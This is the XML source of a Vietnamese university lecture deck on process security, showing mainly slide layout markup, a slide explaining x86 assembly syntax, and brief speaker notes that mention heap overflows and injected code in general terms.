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13"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId114"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="304" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="319" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="324" r:id="rId10"/>
    <p:sldId id="325" r:id="rId11"/>
    <p:sldId id="326" r:id="rId12"/>
    <p:sldId id="327"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92" r:id="rId34"/>
    <p:sldId id="393" r:id="rId35"/>
    <p:sldId id="394" r:id="rId36"/>
    <p:sldId id="285" r:id="rId37"/>
    <p:sldId id="284" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="306" r:id="rId40"/>
    <p:sldId id="286" r:id="rId41"/>
    <p:sldId id="287" r:id="rId42"/>
    <p:sldId id="288" r:id="rId43"/>
    <p:sldId id="290" r:id="rId44"/>
    <p:sldId id="291" r:id="rId45"/>
    <p:sldId id="292" r:id="rId46"/>
    <p:sldId id="351" r:id="rId47"/>
    <p:sldId id="293" r:id="rId48"/>
    <p:sldId id="349" r:id="rId49"/>
    <p:sldId id="350" r:id="rId50"/>
    <p:sldId id="352" r:id="rId51"/>
    <p:sldId id="353" r:id="rId52"/>
    <p:sldId id="354" r:id="rId53"/>
    <p:sldId id="355" r:id="rId54"/>
    <p:sldId id="357" r:id="rId55"/>
    <p:sldId id="358" r:id="rId56"/>
    <p:sldId id="359" r:id="rId57"/>
    <p:sldId id="360" r:id="rId58"/>
    <p:sldId id="361" r:id="rId59"/>
    <p:sldId id="362" r:id="rId60"/>
    <p:sldId id="377" r:id="rId61"/>
    <p:sldId id="378" r:id="rId62"/>
    <p:sldId id="379" r:id="rId63"/>
    <p:sldId id="380" r:id="rId64"/>
    <p:sldId id="381" r:id="rId65"/>
    <p:sldId id="294" r:id="rId66"/>
    <p:sldId id="295" r:id="rId67"/>
    <p:sldId id="363" r:id="rId68"/>
    <p:sldId id="364" r:id="rId69"/>
    <p:sldId id="365" r:id="rId70"/>
    <p:sldId id="366" r:id="rId71"/>
    <p:sldId id="367" r:id="rId72"/>
    <p:sldId id="368" r:id="rId73"/>
    <p:sldId id="369" r:id="rId74"/>
    <p:sldId id="371" r:id="rId75"/>
    <p:sldId id="370" r:id="rId76"/>
    <p:sldId id="372" r:id="rId77"/>
    <p:sldId id="373" r:id="rId78"/>
    <p:sldId id="374" r:id="rId79"/>
    <p:sldId id="323" r:id="rId80"/>
    <p:sldId id="296" r:id="rId81"/>
    <p:sldId id="375" r:id="rId82"/>
    <p:sldId id="376" r:id="rId83"/>
    <p:sldId id="385" r:id="rId84"/>
    <p:sldId id="386" r:id="rId85"/>
    <p:sldId id="387" r:id="rId86"/>
    <p:sldId id="299" r:id="rId87"/>
    <p:sldId id="300" r:id="rId88"/>
    <p:sldId id="382" r:id="rId89"/>
    <p:sldId id="301" r:id="rId90"/>
    <p:sldId id="321" r:id="rId91"/>
    <p:sldId id="298" r:id="rId92"/>
    <p:sldId id="302" r:id="rId93"/>
    <p:sldId id="303" r:id="rId94"/>
    <p:sldId id="383" r:id="rId95"/>
    <p:sldId id="384" r:id="rId96"/>
    <p:sldId id="307" r:id="rId97"/>
    <p:sldId id="388" r:id="rId98"/>
    <p:sldId id="389" r:id="rId99"/>
    <p:sldId id="309" r:id="rId100"/>
    <p:sldId id="310" r:id="rId101"/>
    <p:sldId id="312" r:id="rId102"/>
    <p:sldId id="311" r:id="rId103"/>
    <p:sldId id="322" r:id="rId104"/>
    <p:sldId id="308" r:id="rId105"/>
    <p:sldId id="391" r:id="rId106"/>
    <p:sldId id="313" r:id="rId107"/>
    <p:sldId id="314" r:id="rId108"/>
    <p:sldId id="315" r:id="rId109"/>
    <p:sldId id="316" r:id="rId110"/>
    <p:sldId id="317" r:id="rId111"/>
    <p:sldId id="390" r:id="rId112"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7102475" cy="10233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F56A63-DEAF-4DDF-8292-03EDD95EAE01}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="304"/>
            <p14:sldId id="259"/>
            <p14:sldId id="258"/>
            <p14:sldId id="319"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="324"/>
            <p14:sldId id="325"/>
            <p14:sldId id="326"/>
            <p14:sldId id="327"/>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92"/>
            <p14:sldId id="393"/>
            <p14:sldId id="394"/>
            <p14:sldId id="285"/>
            <p14:sldId id="284"/>
            <p14:sldId id="305"/>
            <p14:sldId id="306"/>
            <p14:sldId id="286"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
            <p14:sldId id="292"/>
            <p14:sldId id="351"/>
            <p14:sldId id="293"/>
            <p14:sldId id="349"/>
            <p14:sldId id="350"/>
            <p14:sldId id="352"/>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="355"/>
            <p14:sldId id="357"/>
            <p14:sldId id="358"/>
            <p14:sldId id="359"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
            <p14:sldId id="362"/>
            <p14:sldId id="377"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
            <p14:sldId id="380"/>
            <p14:sldId id="381"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="363"/>
            <p14:sldId id="364"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{D8637B57-7352-448E-8095-CC1B5B678553}">
          <p14:sldIdLst>
            <p14:sldId id="365"/>
            <p14:sldId id="366"/>
            <p14:sldId id="367"/>
            <p14:sldId id="368"/>
            <p14:sldId id="369"/>
            <p14:sldId id="371"/>
            <p14:sldId id="370"/>
            <p14:sldId id="372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="323"/>
            <p14:sldId id="296"/>
            <p14:sldId id="375"/>
            <p14:sldId id="376"/>
            <p14:sldId id="385"/>
            <p14:sldId id="386"/>
            <p14:sldId id="387"/>
            <p14:sldId id="299"/>
            <p14:sldId id="300"/>
            <p14:sldId id="382"/>
            <p14:sldId id="301"/>
            <p14:sldId id="321"/>
            <p14:sldId id="298"/>
            <p14:sldId id="302"/>
            <p14:sldId id="303"/>
            <p14:sldId id="383"/>
            <p14:sldId id="384"/>
            <p14:sldId id="307"/>
            <p14:sldId id="388"/>
            <p14:sldId id="389"/>
            <p14:sldId id="309"/>
            <p14:sldId id="310"/>
            <p14:sldId id="312"/>
            <p14:sldId id="311"/>
            <p14:sldId id="322"/>
            <p14:sldId id="308"/>
            <p14:sldId id="391"/>
            <p14:sldId id="313"/>
            <p14:sldId id="314"/>
            <p14:sldId id="315"/>
            <p14:sldId id="316"/>
            <p14:sldId id="317"/>
            <p14:sldId id="3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 Trong Tung" initials="BTT" lastIdx="3" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="4272bdfd3ce47d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4BD0FF"/>
    <a:srgbClr val="F60000"/>
    <a:srgbClr val="EE8512"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="008000"/>
    <a:srgbClr val="93A299"/>
    <a:srgbClr val="660066"/>
    <a:srgbClr val="FFCC29"/>
    <a:srgbClr val="F7C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706" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="126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511652"/>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sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023093" y="0"/>
            <a:ext cx="3077739" cy="511652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99057" tIns="49528" rIns="99057" bIns="49528" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="9719598"/>
            <a:ext cx="3077739" cy="511652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99057" tIns="49528" rIns="99057" bIns="49528" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023093" y="9719598"/>
            <a:ext cx="3077739" cy="511652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99057" tIns="49528" rIns="99057" bIns="49528" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{938AC179-C1BA-4A61-B3F2-155DEC75A87E}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325133016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739" cy="511652"/>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4023093" y="0"/>
            <a:ext cx="3077739" cy="511652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99057" tIns="49528" rIns="99057" bIns="49528" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5118100" cy="3840162"/>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710248" y="4860687"/>
            <a:ext cx="5681980" cy="4604862"/>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19598"/>
            <a:ext cx="3077739" cy="511652"/>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4023093" y="9719598"/>
            <a:ext cx="3077739" cy="511652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99057" tIns="49528" rIns="99057" bIns="49528" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5B3C3A60-6FB8-4956-A90F-2277D2577F5C}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4072380129"/>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Xảy ra t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ơng tự trên vùng nhớ heap</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>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51081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Loại mã độc thường được chèn: Mã thực thi hành vi gây hại hoặc mã leo thang quyền điều khiển</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>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37395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Loại mã độc thường được chèn: Mã thực thi hành vi gây hại hoặc mã leo thang quyền điều khiển</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>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4078115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Chúng ta không thể truy cập vào các thành phần của cấu trúc FILE trong C</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1983955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3443"/>
            <a:ext cx="7772400" cy="121655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41412"/>
            <a:ext cx="6858000" cy="916388"/>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155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857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994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6D92-000C-E8F7-BE74-82AC054850E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="71562"/>
            <a:ext cx="5263762" cy="560821"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="00206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D25707D1-9D9E-35E8-FDCF-3E3AD0BE43F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4062CF8-B466-B12F-F6C6-02116B10A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D4B51-3577-807F-958D-E6DDE7B12FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5204753-D591-A5FB-03B1-FE0CF1990DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1081379"/>
            <a:ext cx="48577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1300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3753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8803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A black and blue screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7234041-91F2-C943-27AB-0D5BBE9273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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B8DD78-B698-16E9-DC12-508FF0697A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>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71562"/>
            <a:ext cx="8058150" cy="560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081379"/>
            <a:ext cx="8058150" cy="50955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491520"/>
            <a:ext cx="20574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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028950" y="649947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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457950" y="6491518"/>
            <a:ext cx="2057400" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1CF223-1BB8-ABED-B352-F11BFF182212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>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2B8C83-0055-42B7-ED25-569DD3267D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>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09340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Lst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3200" b="1"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200" err="1"/>
              <a:t>Bài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t> 7.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>An toàn cho tiến trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E18CC9CC-DE1A-D237-F075-18F559BBC347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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210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DEE8-080D-4CD7-F4D3-5DCE67DC4487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cú pháp trên x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{073238E0-25EE-50E3-CB52-09CAF4C8E455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Lấy giá trị trong thanh ghi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%ebp, %esp, %eip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Giá trị hằng trực tiếp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$1, $0x01</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Truy cập ô nhớ theo độ lệch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8(%ebp) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>truy cập ô nhớ nằm ở vị trí 8 byte phía sau địa chỉ ở trong thanh ghi EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lệnh Assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>add $0x8, %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mã giả: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EBX = EBX + 0x8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor 4(%esi), %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mã giả: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>EAX = EAX ^ *(ESI + 4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB">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EA62C2F1-4DE5-7247-9F00-09BD742B321F}"/>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8" name="Google Shape;560;p70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC74E68B-963F-A4A4-F7DB-E187DEBFF959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3043300" y="4118760"/>
            <a:ext cx="1585076" cy="492412"/>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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Opcode</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;562;p70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD49F68-7C3F-BEE1-C3FB-875233DA9645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4628376" y="4118760"/>
